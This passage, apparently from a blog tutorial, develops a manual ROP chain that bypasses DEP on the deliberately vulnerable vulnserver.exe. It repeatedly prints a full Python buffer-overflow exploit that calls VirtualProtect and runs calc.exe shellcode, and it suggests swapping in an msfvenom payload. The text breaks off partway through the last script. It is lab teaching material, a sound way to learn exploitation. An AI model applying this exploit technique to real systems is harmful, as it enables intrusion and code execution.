The tool that will be used to find ROP gadgets is rp++. Some other options are to use mona.py or to search manually. To search manually, all one would need to do is locate all instances of ret and look at the above instructions to see if there is anything useful. Mona will also construct a ROP chain for you that can be used to defeat DEP. This is not the point of this post. The point of this post is that we are going to manually ROP the vulnserver.exe program. Only by manually doing something first, are you able to learn.

Let’s first find all of the dependencies that make up vulnserver.exe, so we can map more ROP chains beyond what is contained in the executable. Execute the following mona.py command in Immunity Debugger:

!mona modules:

Next, use rp++ to enumerate all useful ROP gadgets for all of the dependencies. Here is an example for vulnserver.exe. Run rp++ for each dependency:

The -f options specifies the file. The -r option specifies maximum number of instructions the ROP gadgets can contain (5 in our case).

After this, the POC needs to be updated. The update is going to reserve a place on the stack for the API call to the function VirtualProtect(). I found the address of VirtualProtect() to be at address 0x77e22e15. Remember, in this test environment- ASLR is disabled.

To find the address of VirtualProtect() on your machine, open Immunity and double-click on any instruction in the disassembly window and enter

call kernel32.VirtualProtect:

After this, double click on the same instruction again, to see the address of where the call is happening, which is kernel32.VirtualProtect in this case. Here, you can see the address I referenced earlier:

Also, you need to find a flOldProtect address. You can literally place any address in this parameter, that contains writeable permissions.

Now the POC can be updated:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between future ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

Before moving on, you may have noticed an arbitrary parameter variable for a parameter called return address added into the POC. This is not a part of the official parameters for VirtualProtect(). The reason this address is there (and right under the VirtualProtect() function) is because whenever the call to the function occurs, there needs to be a way to execute our shellcode. The address of return is going to contain the address of the shellcode- so the application will jump straight to the user supplied shellcode after VirtualProtect() runs. The location of the shellcode will be marked as read, write, and execute.

One last thing. The reason we are adding the shellcode now, is because of one of the properties of DEP. The shellcode will not be executed until we change the permissions of DEP. It is written in advance because DEP will allow us to write to the stack, so long as we are not executing.

Set a breakpoint at the address 0x62501022 and execute the updated POC. Step through the breakpoint with F7 in Immunity and take a look at the state of the stack:

Recall that the Windows API, when called, takes the items on the top of the stack (the stack pointer) as the parameters. That is why the items in the POC under the VirtualProtect() call are seen in the function call (because after EIP all of the supplied data is on the stack).

As you can see, all of the parameters are there. Here, at a high level, is we are going to change these parameters.

It is pretty much guaranteed that there is no way we will find five ROP gadgets that EXACTLY equal the values we need. Knowing this, we have to be more creative with our ROP gadgets and how we go about manipulating the stack to do what we need- which is change what values the current placeholders contain.

Instead what we will do, is put the calculated values needed to call VirtualProtect() into a register. Then, we will change the memory addresses of the placeholders we currently have, to point to our calculated values. An example would be, we could get the value for lpAddress into a register. Then, using ROP, we could make the current placeholder for lpAddress point to that register, where the intended value (real value) of lpAddress is.

Again, this is all very high level. Let’s get into some of the more low-level details.

Hey, Stack Pointer- Stay Right There. BRB.

The first thing we need to do is save our current stack pointer. Taking a look at the current state of the registers, that seems to be 0x018DF9E4:

As you will see later on- it is always best to try to save the stack pointer in multiple registers (if possible). The reason for this is simple. The current stack pointer is going to contain an address that is near and around a couple of things: the VirtualProtect() function call and the parameters, as well as our shellcode.

When it comes to exploitation, you never know what the state of the registers could be when you gain control of an application. Placing the current stack pointer into some of the registers allows us to easily be able to make calculations on different things on and around the stack area. If EAX, for example, has a value of 0x00000001 at the time of the crash, but you need a value of 0x12345678 in EAX- it is going to be VERY hard to keep adding to EAX to get the intended value. But if the stack pointer is equal to 0x12345670 at the time of the crash, it is much easier to make calculations, if that value is in EAX to begin with.

Time to break out all of the ROP gadgets we found earlier. It seems as though there are two great options for saving the state of the current stack pointer:

0x77bf58d2: push esp ; pop ecx ; ret  ;  RPCRT4.dll

0x77e4a5e6: mov eax, ecx ; ret  ;  user32.dll

The first ROP gadget will push the value of the stack pointer onto the stack. It will then pop it into ECX- meaning ECX now contains the value of the current stack pointer. The second ROP gadget will move the value of ECX into EAX. At this point, ECX and EAX both contain the current ESP value.

These ROP gadgets will be placed ABOVE the current parameters. The reason is, that these are vital in our calculation process. We are essentially priming the registers before we begin trying to get our intended values into the parameter placeholders. It makes it easier to do this before the VirtualProtect() call is made.

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+shellcode+filler)
s.close()

The state of the registers after the two ROP gadgets (remember to place breakpoint on the stack pivot ret instruction and step through with F7 in each debugging step):

As you can see from the POC above, the parameters to VirtualProtect are next up on the stack after the first two ROP gadgets are executed. Since we do not want to overwrite those parameters, we simply would like to “jump” over them for now. To do this, we can simply add to the current value of ESP, with an add esp, VALUE + ret ROP gadget. This will change the value of ESP to be a greater value than the current stack pointer (which currently contains the call to VirtualProtect()). This means we will be farther down in the stack (past the VirtualProtect() call). Since all of our ROP gadgets are ending with a ret, the new stack pointer (which is greater) will be loaded into EIP, because of the ret instruction in the add esp, VALUE + ret. This will make more sense in the screenshots that will be outlined below showing the execution of the ROP gadget. This will be the last ROP gadget that is included before the parameters.

Again, looking through the gadgets created earlier, here is a viable one:

0x6ff821d5: add esp, 0x1C ; ret  ;  USP10.dll

The updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
rop2 = struct.pack('<L', 0xDEADBEEF)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

As you can see, 0xDEADBEEF has been added to the POC. If all goes well, after the jump over the VirtualProtect() parameters, EIP should contain the memory address 0xDEADBEEF.

ESP is 0x01BCF9EC before execution:

ESP after add esp, 0x1C:

As you can see at this point, 0xDEADBEEF is pointed to by the stack pointer. The next instruction of this ROP gadget is ret. This instruction will take ESP (0xDEADBEEF) and load it into EIP. What this means, is that if successful, we will have successfully jumped over the VirtualProtect() parameters and resumed execution afterwards.

We have successfully jumped over the parameters!:

Now all of the semantics have been taken care of, it is time to start getting the actual parameters onto the stack.

Okay, For Real This Time

Notice the state of the stack after everything has been executed:

We can clearly see under the kernel32.VirtualProtect pointer, the return parameter located at 0x19FF9F0.

Remember how we saved our old stack pointer into EAX and ECX? We are going to use ECX to do some calculations. Right now, ECX contains a value of 0x19FF9E4. That value is C hex bytes, or 12 decimal bytes away from the return address parameter. Let’s change the value in ECX to equal the value of the return parameter.

We will repeat the following ROP gadget multiple times:

0x77e17270: inc ecx ; ret  ; kernel32.dll

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

After execution of the ROP gadgets, ECX has been increased to equal the position of return:

Perfect. ECX now contains a value of the return parameter. Let’s knock out lpAddress while we are here. Since lpAddress comes after the return parameter, it will be located 4 bytes after the return parameter on the stack.

Since ECX already contains the return address, adding four bytes would get us to lpAddress. Let’s use ROP to get ECX copied into another register (EDX in this case) and increase EDX by four bytes!

ROP gadgets:

0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  msvcrt.dll
0x77f226d5: inc edx ; ret  ;  ntdll.dll

Before we move on, take a closer look at the first ROP gadget. The mov edx, ecx instruction is exactly what is needed. The next instruction is a pop ebp. This, as of right now in its current state, would kill our exploit. Recall, pop will take whatever is on the top of the stack away. As of right now, after the first ROP gadget is loaded into EIP- the second ROP gadget above would be located at ESP. The first ROP gadget would actually take the second ROP gadget and throw it in EBP. We don’t want that.

So, what we can do, is we can add “dummy” data directly AFTER the first ROP gadget. That way, that “dummy” data will get popped into EBP (which we do not care about) and the second ROP gadget will be successfully executed.

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)


# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

The below screenshots show the stack and registers right before the pop ebp instruction. Notice that EIP is currently one address space above the current ESP. ESP right now contains a memory address that points to 0x50505050, which is our padding.

Disassembly window before execution:

Current state of the registers (EIP contains the address of the mov edx, ecx instruction at the moment:

The current state of the stack. ESP contains the memory address 0x0189FA3C, which points to 0x50505050:

Now, here is the state of the registers after all of the instructions except ret have been executed. EDX now contains the same value as ECX, and EBP contains our intended padding value of 0x50505050!:

Remember that we still need to increase EDX by four bytes. The ROP gadgets after the mov edx, ecx + pop ebp + ret take care of this:

Now we have the memory address of the return parameter placeholder in ECX, and the memory address of the lpAddress parameter placeholder in EDX. Let’s take a look at the stack for a second:

Right now , our shellcode is about 100 hex bytes, or about 256 bytes away, from the current return and lpAddress placeholders. Remember when earlier we saved the old stack pointer into two registers: EAX and ECX? Recall also, that we have already manipulated the value of ECX to equal the value of the return parameter placeholder.

EAX still contains the original stack pointer value. What we need to do, is manipulate EAX to equal the location of our shellcode. Well, that isn’t entirely true. Recall in the updated POC, there is a padding variable of 250 NOPs. All we need is EAX to equal an address within those NOPS that come a bit before the shellcode, since the NOPs will slide into the shellcode.

What we need to do, is increase EAX by about 100 bytes, which should be close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down on the stack. If this happens, EAX would no longer be pointing to an area around our shellcode. Again, if this problem arises, we can just come back and repeat the process of adding to EAX again.

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We will need two of these instructions. Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

Now EAX contains an address that is around our shellcode, and will lead to execution of shellcode when it is returned to after the VirtualProtect() call, via a NOP sled:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here- we just want to change what the memory addresses in ECX and EDX point to. Right now, they contain memory addresses- but they are not pointers to anything.

With a mov dword ptr ds:[ecx], eax instruction we could accomplish what we need. What mov dword ptr ds:[ecx], eax will do, is take the DWORD value (size of an x86 register) ECX is currently pointing to (which is the return parameter) and change that value, to make that DWORD in ECX (the address of return) point to EAX’s value (the shellcode address).

To clarify- here we are not making ECX point to EAX. We are making the return address point to the address of the shellcode. That way on the stack, whenever the memory address of return is anywhere, it will automatically be referenced (pointed to) by the shellcode address.

We also need to do the same with EDX. EDX contains the parameter placeholder for lpAddress at the moment. This also needs to point to our shellcode, which is contained in EAX. This means an instruction of mov dword ptr ds:[edx], eax is needed. It will do the same thing mentioned above, but it will use EDX instead of ECX.

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
